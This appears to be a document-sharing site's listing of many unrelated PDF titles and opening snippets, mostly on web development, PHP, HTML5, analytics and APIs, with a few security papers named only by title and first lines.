Web Development Guide. Information Systems Web Development Guide Information Systems Gabriel Malveaux May 2013 Web Development Guide Getting Started In order to get started with your web development, you will need some basic software. In this guide

More information

API. Application Programmers Interface document. For more information, please contact: Version 2.01 Aug 2015

API. Application Programmers Interface document. For more information, please contact: Version 2.01 Aug 2015 API Application Programmers Interface document Version 2.01 Aug 2015 For more information, please contact: Technical Team T: 01903 228100 / 01903 550242 E: info@24x.com Page 1 Table of Contents Overview...

More information

This tutorial assumes that you are familiar with ASP.Net and ActiveX controls.

This tutorial assumes that you are familiar with ASP.Net and ActiveX controls. ASP.Net with Iocomp ActiveX controls This tutorial assumes that you are familiar with ASP.Net and ActiveX controls. Steps to host an Iocomp ActiveX control in an ASP.NET page using Visual Studio 2003 The

More information

Secure Testing Service

Secure Testing Service Secure Testing Service Overview and pre-release use Authors: Andrej Sokoll Matthew Loewengart Revisions: 2011 Version 1.0 Page 2 Contents Overview... 3 Background... 3 How does the secure testing service

More information

Web Design Course. Home Page. Join in. Home. Objectives. Course Content. Assignments & Discussion. Grades. Help. Contact Me aab43@uakron.

Web Design Course. Home Page. Join in. Home. Objectives. Course Content. Assignments & Discussion. Grades. Help. Contact Me aab43@uakron. Home Page Web Design Course Join in Navigation Bar: Home Objectives Course Content Assignments & Discussion Grades Help Contact Me aab43@uakron.edu Welcome to web design course., This course is designed

More information

TRACKING CHAT DRIVEN CONVERSIONS

TRACKING CHAT DRIVEN CONVERSIONS Integrating Google Analytics with BoldChat. Highlights Thousands of customers, worldwide Reliable 99.99% uptime The industry s best value Fully deploys in days 24/7 support Proven installs across vertical

More information

Links Getting Started with Widgets, Gadgets and Mobile Apps

Links Getting Started with Widgets, Gadgets and Mobile Apps Widgets, Gadgets, and Mobile Apps for Libraries: Tips, Code Samples, Explanations, and Downloads Michael Sauers Technology Innovation Librarian Nebraska Library Commission msauers@nlc.state.ne.us Jason

More information

Ulteo Open Virtual Desktop - Protocol Description

Ulteo Open Virtual Desktop - Protocol Description Ulteo Open Virtual Desktop - Protocol Description Copyright 2008 Ulteo SAS 1 LIST OF PROTOCOLS USED CONTENTS Contents 1 List of Protocols used 1 1.1 Hyper Text Transfert Protocol (HTTP)..............................

More information

Web Security Scan. 10 November, 2013. Developer Report

Web Security Scan. 10 November, 2013. Developer Report Web Security Scan 0 November, 203 Developer Report Scan of http://testphp.vulnweb.com Scan details Scan information Start time 0--203 7:6:39 Finish time 0--203 7:2:46 Scan time 5 minutes, 7 seconds Profile

More information

Tutorial básico del método AJAX con PHP y MySQL

Tutorial básico del método AJAX con PHP y MySQL 1 de 14 02/06/2006 16:10 Tutorial básico del método AJAX con PHP y MySQL The XMLHttpRequest object is a handy dandy JavaScript object that offers a convenient way for webpages to get information from servers

More information

HTML Fails: What No One Tells You About Email HTML

HTML Fails: What No One Tells You About Email HTML HTML Fails: What No One Tells You About Email HTML 2 Today s Webinar Presenter Kate McDonough Campaign Manager at PostUp Worked with various ESPs: Constant Contact, Campaign Monitor, ExactTarget, Distribion

More information

Boosting Campaign Performance Through Web Analytics. David Kamerer, PhD, APR Loyola University Chicago

Boosting Campaign Performance Through Web Analytics. David Kamerer, PhD, APR Loyola University Chicago Boosting Campaign Performance Through Web Analytics David Kamerer, PhD, APR Loyola University Chicago Whose web is it? Phase 1: IT Phase 2: designers Phase 3: content creators An embarrassing question:

More information

Server-side: PHP and MySQL (continued)

Server-side: PHP and MySQL (continued) Server-side: PHP and MySQL (continued) some remarks check on variable: isset ( $variable )? more functionality in a single form more functionality in a single PHP-file updating the database data validation

More information

Exploiting Local File Inclusion in A Co-Hosting Environment

Exploiting Local File Inclusion in A Co-Hosting Environment Whitepaper Exploiting Local File Inclusion in A Co-Hosting Environment A Proof-of-Concept Utkarsh Bhatt Anant Kochhar TABLE OF CONTENTS Abstract... 4 Introduction... 4 Upload Modules... 4 Local File Inclusion...

More information

AAI-enabling Web Applications (personalized, dynamic content in PHP, ASP, Perl, Java,...) Valéry Tschopp

AAI-enabling Web Applications (personalized, dynamic content in PHP, ASP, Perl, Java,...) Valéry Tschopp <tschopp@switch.ch> AAI-enabling Web Applications (personalized, dynamic content in PHP, ASP, Perl, Java,...) Valéry Tschopp 2005 SWITCH AAI Attribute Transmission Attributes Store SAML Attributes Home

More information

Mobile Web Applications using HTML5. L. Cotfas 14 Dec. 2011

Mobile Web Applications using HTML5. L. Cotfas 14 Dec. 2011 Mobile Web Applications using HTML5 L. Cotfas 14 Dec. 2011 Reasons for mobile web development Many different platforms: Android, IPhone, Symbian, Windows Phone/ Mobile, MeeGo (only a few of them) Reasons

More information

AUTOMATIC INVENTORY CONTROL SYSTEM

AUTOMATIC INVENTORY CONTROL SYSTEM AUTOMATIC INVENTORY CONTROL SYSTEM Mohammad Mohsin Rumi 07141003 [Old ID: 02201070] Department of Computer Science and Engineering May 2007 BRAC University, Dhaka, Bangladesh 1 Supervisor - Sayeed Salam,

More information

APEX World 2013 APEX & Christian Rokitta. OGh APEX World 9 April 2013

APEX World 2013 APEX & Christian Rokitta. OGh APEX World 9 April 2013 APEX World 2013 APEX & Christian Rokitta OGh APEX World 9 April 2013 Samenwerkingsverband van zelfstandige APEX professionals smart4apex.nl 75 APEX sessions in 4 days + Symposium day with Oracle Dev Team

More information

Web Application Report

Web Application Report Web Application Report Security Report This report was created by IBM Rational AppScan 7.8.0.0 2/11/2009 5:25:03 PM 2/11/2009 5:25:03 PM 1/28 Copyright IBM Corp. 2000, 2009. All Rights Reserved. Report

More information

EXPLORATiON in THE CROSS TERRiTORY the inevitable continuation of my first paper: Cross Site Scripting - Attack and Defense guide

EXPLORATiON in THE CROSS TERRiTORY the inevitable continuation of my first paper: Cross Site Scripting - Attack and Defense guide EXPLORATiON in THE CROSS TERRiTORY the inevitable continuation of my first paper: Cross Site Scripting - Attack and Defense guide By Xylitol Summary: The Cross Frame Scripting \ Theoretical explanation

More information

Sample Code with Output

Sample Code with Output Sample Code with Output File Upload : In PHP, we can upload file to a server fileupload.html #menu a #content #italictext

More information

Payment Page Integration Guide

Payment Page Integration Guide Payment Page Integration Guide Version 2.2 - May 2015 Table of Contents About this Guide...3 Introduction...4 Benefits of the Hosted Payment Page:...4 Submitting a Payment Request...5 Payment Request parameters...5

More information

CS134 Web Site Design & Development. Quiz1

CS134 Web Site Design & Development. Quiz1 CS134 Web Site Design & Development Quiz1 Name: Score: Email: I Multiple Choice Questions (2 points each, total 20 points) 1. Which of the following is an example of an IP address? [Answer: d] a. www.whitehouse.gov

More information

Hybrid Approach to Search Engine Optimization (SEO) Techniques

Hybrid Approach to Search Engine Optimization (SEO) Techniques Suresh Gyan Vihar University Journal of Engineering & Technology (An International Bi Annual Journal) Vol. 1, Issue 2, 2015, pp.1-5 ISSN: 2395 0196 Hybrid Approach to Search Engine Optimization (SEO) Techniques

More information

Technical Specification ideal

Technical Specification ideal Technical Specification ideal (IDE.001) Author(s): Michel Westerink (MW) Version history: V1.0 MW (Copy from targetpay.com) 07/01/13 V1.0 MKh New error codes 20/02/14 V1.1 TZ New IP whitelisted 29/08/14

More information

Fax via HTTP (POST) Traitel Telecommunications Pty Ltd 2012 Telephone: (61) (2) 9032 2700. Page 1

Fax via HTTP (POST) Traitel Telecommunications Pty Ltd 2012 Telephone: (61) (2) 9032 2700. Page 1 Fax via HTTP (POST) Page 1 Index: Introduction:...3 Usage:...3 Page 2 Introduction: TraiTel Telecommunications offers several delivery methods for its faxing service. This document will describe the HTTP/POST

More information

We begin with a number of definitions, and follow through to the conclusion of the installation.

We begin with a number of definitions, and follow through to the conclusion of the installation. Owl-Hosted Server Version 0.9x HOW TO Set up Owl using cpanel Introduction Much of the documentation for the installation of Owl Intranet Knowledgebase assumes a knowledge of servers, and that the installation

More information

1. Building Testing Environment

1. Building Testing Environment The Practice of Web Application Penetration Testing 1. Building Testing Environment Intrusion of websites is illegal in many countries, so you cannot take other s web sites as your testing target. First,

More information

Adding Value to Automated Web Scans. Burp Suite and Beyond

Adding Value to Automated Web Scans. Burp Suite and Beyond Adding Value to Automated Web Scans Burp Suite and Beyond Automated Scanning vs Manual Tes;ng Manual Tes;ng Tools/Suites At MSU - QualysGuard WAS & Burp Suite Automated Scanning - iden;fy acack surface

More information

NT Authentication Configuration Guide

NT Authentication Configuration Guide NT Authentication Configuration Guide Version 11 Last Updated: March 2014 Overview of Ad Hoc Security Models Every Ad Hoc instance relies on a security model to determine the authentication process for

More information

Improving Magento Front-End Performance

Improving Magento Front-End Performance Improving Magento Front-End Performance If your Magento website consistently loads in less than two seconds, congratulations! You already have a high-performing site. But if your site is like the vast

More information

my First PHP Lab

<head> <meta content=text/html; charset=utf-8 http-equiv=content-type /> <title>my First PHP Lab</title> </head> Lab1.html my First PHP Lab Please enter your Username and Email Name:

More information

WA 2. GWT Martin Klíma

WA 2. GWT Martin Klíma WA 2 GWT Martin Klíma GWT What is it? Google Web Toolkig Compiler from Java to JavaScript + HTML Set of JavaScript and Java scripts / classes Development environment SDK Integration with IDE Eclipse, Netbeans,

More information

Welcome to CSE 330 Crea0ve Progamming and Rapid Prototyping. Course Informa0on

Welcome to CSE 330 Crea0ve Progamming and Rapid Prototyping. Course Informa0on Welcome to CSE 330 Crea0ve Progamming and Rapid Prototyping 1 Extensible - CSE 330 Creative Networking Programming Platform and Rapid Prototyping 1 Course Informa0on Instructor Todd Sproull todd@wustl.edu

More information

INSTALLING, CONFIGURING, AND DEVELOPING WITH XAMPP

INSTALLING, CONFIGURING, AND DEVELOPING WITH XAMPP INSTALLING, CONFIGURING, AND DEVELOPING WITH XAMPP by Dalibor D. Dvorski, March 2007 Skills Canada Ontario DISCLAIMER: A lot of care has been taken in the accuracy of information provided in this article,

More information

FireBLAST Email Marketing Solution v2

FireBLAST Email Marketing Solution v2 Installation Guide WELCOME to fireblast, one of the Industry s leading Email Marketing Software Solutions for your business. Whether you are creating a small email campaign, or you are looking to upgrade

More information

Analysis and web structures optimization

Analysis and web structures optimization Analysis and web structures optimization Zdenka Prokopova, Radek Silhavy, and Petr Silhavy Abstract The aim of the presented paper is to familiarize the reader with methods and techniques of web structures

More information

RIGHTNOW TECHNOLOGIES

RIGHTNOW TECHNOLOGIES RIGHTNOW TECHNOLOGIES Implementing SiteCatalyst in RightNow Technologies August 20, 2008 Version 2.0 CHAPTER 1 1 Overview RightNow Technologies is a popular customer relationship management (CRM system

More information

PHP and XML. Brian J. Stafford, Mark McIntyre and Fraser Gallop

PHP and XML. Brian J. Stafford, Mark McIntyre and Fraser Gallop What is PHP? PHP and XML Brian J. Stafford, Mark McIntyre and Fraser Gallop PHP is a server-side tool for creating dynamic web pages. PHP pages consist of both HTML and program logic. One of the advantages

More information

Content Management System

Content Management System Content Management System XT-CMS INSTALL GUIDE Requirements The cms runs on PHP so the host/server it is intended to be run on should ideally be linux based with PHP 4.3 or above. A fresh install requires

More information

HTML5 and CSS3. new semantic elements advanced form support CSS3 features other HTML5 features

HTML5 and CSS3. new semantic elements advanced form support CSS3 features other HTML5 features HTML5 and CSS3 new semantic elements advanced form support CSS3 features other HTML5 features fallback solutions HTML5 and CSS3 are new and evolving standards two levels of fallback different browsers

More information

How to Configure edgebox as a Web Server

How to Configure edgebox as a Web Server intelligence at the edge of the network www.critical-links.com edgebox V4.5 Introduction: The Web Server panel allows the simple creation of multiple web sites using the Apache web server. Each website

More information

Twinfield Single Sign On

Twinfield Single Sign On Twinfield Single Sign On manual, version 5.4 April 2009 For general information about our webservices see the Twinfield Webservices Manual Twinfield International NV De Beek 9-15 3871 MS Hoevelaken Netherlands

More information

Turning Data into Information Tools, Tips, and Training

Turning Data into Information Tools, Tips, and Training A Summer Series Sponsored by Erin Gore, Institutional Data Council Chair; Berkeley Policy Analysts Roundtable, Business Process Analysis Working Group (BPAWG) and Cal Assessment Network (CAN) Web Data

More information

Web development, as you it

Web development, as you it Web development, as you it Lukas Renggli Academics PhD Student, University of Bern Industry Independent Software Consultant Communities Core-developer of Seaside Author of Magritte and Pier Agenda Natural

More information

Livezilla How to Install on Shared Hosting http://www.jonathanmanning.com By: Jon Manning

Livezilla How to Install on Shared Hosting http://www.jonathanmanning.com By: Jon Manning Livezilla How to Install on Shared Hosting By: Jon Manning This is an easy to follow tutorial on how to install Livezilla 3.2.0.2 live chat program on a linux shared hosting server using cpanel, linux

More information

Introduction to web development and JavaScript

Introduction to web development and JavaScript Objectives Chapter 1 Introduction to web development and JavaScript Applied Load a web page from the Internet or an intranet into a web browser. View the source code for a web page in a web browser. Knowledge

More information

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh Web applications Web security: web basics Myrto Arapinis School of Informatics University of Edinburgh HTTP March 19, 2015 Client Server Database (HTML, JavaScript) (PHP) (SQL) 1 / 24 2 / 24 URLs HTTP

More information

Introduction to Web Development with Dreamweaver

Introduction to Web Development with Dreamweaver ITS Training Introduction to Web Development with Dreamweaver In this Workshop In this workshop you will be introduced to HTML basics and using Dreamweaver to create and edit web files. You will learn

More information

Setup and Administration for ISVs

Setup and Administration for ISVs 17 Setup and Administration for ISVs ISV accounts for both hosted and private cloud support white labeling functionality and give you the ability to provision and manage customer tenants directly. A customer

More information

Embedding tracking code into IAS

Embedding tracking code into IAS Embedding tracking code into IAS Author: GeoWise User Support Released: 23/11/2011 Version: 6.4.4 Embedding tracking code into IAS Table of Contents 1. Introduction... 1 2. Pre-requisites... 1 2.1. Sign

More information

Web Development in Java Live Demonstrations (Live demonstrations done using Eclipse for Java EE 4.3 and WildFly 8)

Web Development in Java Live Demonstrations (Live demonstrations done using Eclipse for Java EE 4.3 and WildFly 8) Web Development in Java Live Demonstrations (Live demonstrations done using Eclipse for Java EE 4.3 and WildFly 8) Java Servlets: 1. Switch to the Java EE Perspective (if not there already); 2. File >

More information

Differences between HTML and HTML 5

Differences between HTML and HTML 5 Differences between HTML and HTML 5 1 T.N.Sharma, 2 Priyanka Bhardwaj, 3 Manish Bhardwaj Abstract: Web technology is a standard that allow developing web applications with the help of predefined sets of

More information

Saya WebServer Mini-project report

Saya WebServer Mini-project report Saya WebServer Mini-project report Introduction: The Saya WebServer mini-project is a multipurpose one. One use of it is when a lecturer (of the cs faculty) is at the reception desk and interested in knowing

More information

Web Performance Boot Camp. Speed It Up

Web Performance Boot Camp. Speed It Up Web Performance Boot Camp / Speed It Up Who am I? @postwait on twitter Author of Scalable Internet Architectures Pearson, ISBN: 067232699X (and Web Operations by O Reilly) CEO of OmniTI We build scalable

More information

BUILDING MOBILE WEB APPS WITH PHONEGAP. Matt Zukowski

BUILDING MOBILE WEB APPS WITH PHONEGAP. Matt Zukowski BUILDING MOBILE WEB APPS WITH PHONEGAP Matt Zukowski This slide deck https://slid.es/zukzuk/phonegap 1. Install Android Development Tools 2. Install Phonegap 3. Build a simple app using Phonegap 4. Build

More information

Creating Java EE Applications and Servlets with IntelliJ IDEA

Creating Java EE Applications and Servlets with IntelliJ IDEA Creating Java EE Applications and Servlets with IntelliJ IDEA In this tutorial you will: 1. Create IntelliJ IDEA project for Java EE application 2. Create Servlet 3. Deploy the application to JBoss server

More information

Web Accessibility Checker atutor.ca/achecker. Friday October 31, 2014 06:43:15

Web Accessibility Checker atutor.ca/achecker. Friday October 31, 2014 06:43:15 Friday October 31, 2014 06:43:15 Source URL: https://abonneren.rijksoverheid.nl Source Title: Abonneren Abonneren.Rijksoverheid.nl Accessibility Review (Guidelines: WCAG 2.0 (Level AAA)) Report on known

More information

Uw partner in system management oplossingen

Uw partner in system management oplossingen Uw partner in system management oplossingen User Centric IT Bring your Own - Corporate Owned Onderzoek Forrester Welke applicatie gebruik je het meest op mobiele devices? Email 76% SMS 67% IM / Chat 48%

More information

Make a Joomla Template in 5 Easy Steps A Beginners Guide

Make a Joomla Template in 5 Easy Steps A Beginners Guide Make a Joomla Template in 5 Easy Steps A Beginners Guide By Gary Reid http://clubtvk.com Copyright 2006 Gary Reid. All Rights Reserved. No part of this book may be used or reproduced in any manner whatsoever

More information

Introduction to Web Development

Introduction to Web Development Introduction to Web Development Week 2 - HTML, CSS and PHP Dr. Paul Talaga 487 Rhodes paul.talaga@uc.edu ACM Lecture Series University of Cincinnati, OH October 16, 2012 1 / 1 HTML Syntax For Example:

More information

SmartTouch R CRM Enhancements. 1. Administrators now have an Account Preferences Section where you can view emails & phones in search views.

SmartTouch R CRM Enhancements. 1. Administrators now have an Account Preferences Section where you can view emails & phones in search views. SmartTouch R CRM Enhancements 1. Administrators now have an Account Preferences Section where you can view emails & phones in search views. You now have the option to view Email Address and/or Phone Number

More information

Create dynamic sites with PHP & MySQL

Create dynamic sites with PHP & MySQL Create dynamic sites with PHP & MySQL Presented by developerworks, your source for great tutorials Table of Contents If you're viewing this document online, you can click any of the topics below to link

More information

Oracle Eloqua HIPAA Advanced Data Security Add-on Cloud Service

Oracle Eloqua HIPAA Advanced Data Security Add-on Cloud Service http://docs.oracle.com Oracle Eloqua HIPAA Advanced Data Security Add-on Cloud Service Configuration Guide 2015 Oracle Corporation. All rights reserved 05/11/2015 Contents 1 HIPAA 3 1.0.1 What is HIPAA?

More information

Penetration Testing Report Client: Business Solutions June 15 th 2015

Penetration Testing Report Client: Business Solutions June 15 th 2015 Penetration Testing Report Client: Business Solutions June 15 th 2015 Acumen Innovations 80 S.W 8 th St Suite 2000 Miami, FL 33130 United States of America Tel: 1-888-995-7803 Email: info@acumen-innovations.com

More information

Big Data Meets Infosec Visualiza4on. Forensics Challenge 10 Honeynet.org

Big Data Meets Infosec Visualiza4on. Forensics Challenge 10 Honeynet.org Big Data Meets Infosec Visualiza4on Forensics Challenge 10 Honeynet.org Challenge Design and build a visualiza4on that describes the aaacks that were analyzed in FC5. Use the three prize winners solu4ons

More information

STABLE & SECURE BANK lab writeup. Page 1 of 21

STABLE & SECURE BANK lab writeup. Page 1 of 21 STABLE & SECURE BANK lab writeup 1 of 21 Penetrating an imaginary bank through real present-date security vulnerabilities PENTESTIT, a Russian Information Security company has launched its new, eighth

More information

TheComplete GoogleAnalytics PowerUserGuide

TheComplete GoogleAnalytics PowerUserGuide TheComplete GoogleAnalytics PowerUserGuide 1 Introduction: Google Analytics (GA) can be a powerful tool. It can also be incredibly intimidating for new users. This guide is a compilation of VKI's Google

More information

Site Store Pro. INSTALLATION GUIDE WPCartPro Wordpress Plugin Version

Site Store Pro. INSTALLATION GUIDE WPCartPro Wordpress Plugin Version Site Store Pro INSTALLATION GUIDE WPCartPro Wordpress Plugin Version WPCARTPRO INTRODUCTION 2 SYSTEM REQUIREMENTS 4 DOWNLOAD YOUR WPCARTPRO VERSION 5 EXTRACT THE FOLDERS FROM THE ZIP FILE TO A DIRECTORY

More information

HowTo. Planning table online

HowTo. Planning table online HowTo Project: Description: Planning table online Installation Version: 1.0 Date: 04.09.2008 Short description: With this document you will get information how to install the online planning table on your

More information

Internet Ohjelmointi 1 Examples 4

Internet Ohjelmointi 1 Examples 4 Internet Ohjelmointi 1 Example 1 4 form 5 6 7 8 Loan Amount 9 Monthly Repayment

More information

CPE111 COMPUTER EXPLORATION

CPE111 COMPUTER EXPLORATION CPE111 COMPUTER EXPLORATION BUILDING A WEB SERVER ASSIGNMENT You will create your own web application on your local web server in your newly installed Ubuntu Desktop on Oracle VM VirtualBox. This is a

More information

Welcome to Collage (Draft v0.1)

Welcome to Collage (Draft v0.1) Welcome to Collage (Draft v0.1) Table of Contents Welcome to Collage (Draft v0.1)... 1 Table of Contents... 1 Overview... 2 What is Collage?... 3 Getting started... 4 Searching for Images in Collage...

More information

SAMSUNG SMARTTV: HOW-TO TO CREATING INSECURE DEVICE IN TODAY S WORLD. Sergey Belov

SAMSUNG SMARTTV: HOW-TO TO CREATING INSECURE DEVICE IN TODAY S WORLD. Sergey Belov Sergey Belov # whoami Penetration tester @ Digital Security Bug hunter Speaker Agenda SmartTV - what is it? Current state of research (in the world) Samsung Smart TV - series 2008-2014 Emulator vs real

More information

Web Development using PHP (WD_PHP) Duration 1.5 months

Web Development using PHP (WD_PHP) Duration 1.5 months Duration 1.5 months Our program is a practical knowledge oriented program aimed at learning the techniques of web development using PHP, HTML, CSS & JavaScript. It has some unique features which are as

More information

HTML Redirect Integration Guide

HTML Redirect Integration Guide Business Gateway HTML Redirect Integration Guide V5.2 September 2015 Use this guide to: Integrate your website with Worldpay Create and test HTML Redirect orders Look up ISO codes, payment method codes,

More information

AD Phonebook 2.2. Installation and configuration. Dovestones Software

AD Phonebook 2.2. Installation and configuration. Dovestones Software AD Phonebook 2.2 Installation and configuration 1 Table of Contents Introduction... 3 AD Self Update... 3 Technical Support... 3 Prerequisites... 3 Installation... 3 Adding a service account and domain

More information

Download: Server-side technologies. WAMP (Windows), http://www.wampserver.com/en/ MAMP (Mac), http://www.mamp.info/en/

Download: Server-side technologies. WAMP (Windows), http://www.wampserver.com/en/ MAMP (Mac), http://www.mamp.info/en/ + 1 Server-side technologies Apache,, Download: Apache Web Server: http://httpd.apache.org/download.cgi application server: http://www.php.net/downloads.php DBMS: http://www.mysql.com/downloads/ LAMP:

More information

LIBRARY MANAGEMENT SYSTEM

LIBRARY MANAGEMENT SYSTEM Mini Project Report On LIBRARY MANAGEMENT SYSTEM Submitted By: PRABHAKAR KUMAR RAHUL KUMAR RAJAT SINGH VIKRAM PRATAP SINGH In partial fulfillment for the award of the degree of B. TECH DEGREE In COMPUTER

More information

Relationele Databases 2002/2003

Relationele Databases 2002/2003 1 Relationele Databases 2002/2003 Hoorcollege 5 22 mei 2003 Jaap Kamps & Maarten de Rijke April Juli 2003 Plan voor Vandaag Praktische dingen 3.8, 3.9, 3.10, 4.1, 4.4 en 4.5 SQL Aantekeningen 3 Meer Queries.

More information

Workshop - Day 1. symfony workshop www.symfony-project.com www.sensiolabs.com

Workshop - Day 1. symfony workshop www.symfony-project.com www.sensiolabs.com Workshop - Day 1 symfony workshop www.symfony-project.com www.sensiolabs.com Symfony Introduction symfony workshop www.symfony-project.com www.sensiolabs.com Sensio Sensio Web Agency Web agency Webmarketing

More information

Apple URL Scheme Reference

Apple URL Scheme Reference Apple URL Scheme Reference Contents About Apple URL Schemes 4 At a Glance 4 Composing Items Using Mail 4 Starting a Phone or FaceTime Conversation 4 Specifying Text Messages 5 Opening Locations in Maps

More information

shweclassifieds v 3.3 Php Classifieds Script (Joomla Extension) User Manual (Revision 2.0)

shweclassifieds v 3.3 Php Classifieds Script (Joomla Extension) User Manual (Revision 2.0) shweclassifieds v 3.3 Php Classifieds Script (Joomla Extension) User Manual (Revision 2.0) Contents Installation Procedure... 4 What is in the zip file?... 4 Installing from Extension Manager... 6 Updating

More information

Web application security

Web application security Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0

More information

Symfony 2 Tutorial. Model. Neues Bundle erstellen: php app/console generate:bundle --namespace=blogger/blogbundle

Symfony 2 Tutorial. Model. Neues Bundle erstellen: php app/console generate:bundle --namespace=blogger/blogbundle Symfony 2 Tutorial Neues Bundle erstellen: php app/console generate:bundle --namespace=blogger/blogbundle Eintrag erfolgt in app/appkernel.php und app/config/routing.yml. Model Available types: array,

More information

UNIX Web Hosting Support Documentation

UNIX Web Hosting Support Documentation UNIX Web Hosting Support Documentation Web Hosting Basics Control Panel Access your Control Panel at http://your-domain-name.com/stats/ to change your password, setup your e-mail accounts, administer your

More information

Web Application Security. Srikumar Venugopal S2, Week 8, 2013

Web Application Security. Srikumar Venugopal S2, Week 8, 2013 Web Application Security Srikumar Venugopal S2, Week 8, 2013 Before we start Acknowledgements This presentation contains material prepared by Halvard Skogsrud, Senior Software Engineer, Thoughtworks, Inc.

More information

IPv6 ISP Enabled Specification

IPv6 ISP Enabled Specification IPv6 Enabled Program V1.0.1 (2010-09) IPv6 Forum http://www.ipv6forum.com IPv6 FORUM 1 IPv6 Enabled Program MODIFICATION RECORD Version 1.0.1. Sep 7, 2010 Add the script sample and the description of a

More information

MODx Web Development. Antano Solar John. Chapter No. 5 "Authentication and Authorization"

MODx Web Development. Antano Solar John. Chapter No. 5 Authentication and Authorization MODx Web Development Antano Solar John Chapter No. 5 "Authentication and Authorization" In this package, you will find: A Biography of the author of the book A preview chapter from the book, Chapter No.

More information

Setup Citrix Access Gateway Enterprise Edition (NetScaler) for use of multiple authentication methods.

Setup Citrix Access Gateway Enterprise Edition (NetScaler) for use of multiple authentication methods. Nordic Edge One Time Password (OTP Server) has a comprehensive RADIUS support, including support for multiple authentication methods. This means that the end user can choose authentication method: SMS,

More information

Big Bad Moodle Guide By Mike Tupker mtupker@mtmercy.edu Version 1

Big Bad Moodle Guide By Mike Tupker mtupker@mtmercy.edu Version 1 Big Bad Moodle Guide By Mike Tupker mtupker@mtmercy.edu Version 1 Introduction. I m a Desktop Technician/Network Administrator at Mount Mercy College in Cedar Rapids Iowa. This document is a how to for

More information